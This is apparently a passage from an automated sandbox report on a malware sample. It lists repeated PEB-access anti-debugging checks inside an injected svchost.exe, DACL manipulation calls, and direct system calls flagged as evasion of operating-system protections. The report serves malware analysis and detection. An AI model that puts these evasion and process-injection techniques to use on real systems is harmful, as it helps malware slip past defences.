            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h]1_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h]1_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h]1_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h]1_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035325E0 mov eax, dword ptr fs:[00000030h]1_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h]1_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h]1_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E59C mov eax, dword ptr fs:[00000030h]1_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532582 mov eax, dword ptr fs:[00000030h]1_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532582 mov ecx, dword ptr fs:[00000030h]1_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564588 mov eax, dword ptr fs:[00000030h]1_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h]1_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h]1_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA456 mov eax, dword ptr fs:[00000030h]1_2_035EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352645D mov eax, dword ptr fs:[00000030h]1_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355245A mov eax, dword ptr fs:[00000030h]1_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC460 mov ecx, dword ptr fs:[00000030h]1_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C427 mov eax, dword ptr fs:[00000030h]1_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035304E5 mov ecx, dword ptr fs:[00000030h]1_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA49A mov eax, dword ptr fs:[00000030h]1_2_035EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035644B0 mov ecx, dword ptr fs:[00000030h]1_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BA4B0 mov eax, dword ptr fs:[00000030h]1_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035364AB mov eax, dword ptr fs:[00000030h]1_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528B50 mov eax, dword ptr fs:[00000030h]1_2_03528B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEB50 mov eax, dword ptr fs:[00000030h]1_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FAB40 mov eax, dword ptr fs:[00000030h]1_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D8B42 mov eax, dword ptr fs:[00000030h]1_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352CB7E mov eax, dword ptr fs:[00000030h]1_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604B00 mov eax, dword ptr fs:[00000030h]1_2_03604B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h]1_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h]1_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h]1_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h]1_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEBD0 mov eax, dword ptr fs:[00000030h]1_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EBFC mov eax, dword ptr fs:[00000030h]1_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BCBF0 mov eax, dword ptr fs:[00000030h]1_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h]1_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h]1_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h]1_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h]1_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h]1_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h]1_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h]1_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h]1_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEA60 mov eax, dword ptr fs:[00000030h]1_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BCA11 mov eax, dword ptr fs:[00000030h]1_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h]1_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h]1_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA24 mov eax, dword ptr fs:[00000030h]1_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EA2E mov eax, dword ptr fs:[00000030h]1_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530AD0 mov eax, dword ptr fs:[00000030h]1_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h]1_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h]1_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h]1_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h]1_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568A90 mov edx, dword ptr fs:[00000030h]1_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604A80 mov eax, dword ptr fs:[00000030h]1_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h]1_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h]1_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586AA4 mov eax, dword ptr fs:[00000030h]1_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B0946 mov eax, dword ptr fs:[00000030h]1_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604940 mov eax, dword ptr fs:[00000030h]1_2_03604940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h]1_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h]1_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC97C mov eax, dword ptr fs:[00000030h]1_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov eax, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov edx, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov eax, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC912 mov eax, dword ptr fs:[00000030h]1_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528918 mov eax, dword ptr fs:[00000030h]1_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528918 mov eax, dword ptr fs:[00000030h]1_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h]1_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h]1_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B892A mov eax, dword ptr fs:[00000030h]1_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C892B mov eax, dword ptr fs:[00000030h]1_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035649D0 mov eax, dword ptr fs:[00000030h]1_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA9D3 mov eax, dword ptr fs:[00000030h]1_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C69C0 mov eax, dword ptr fs:[00000030h]1_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h]1_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h]1_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03560854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03542840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03552835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006AA364 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
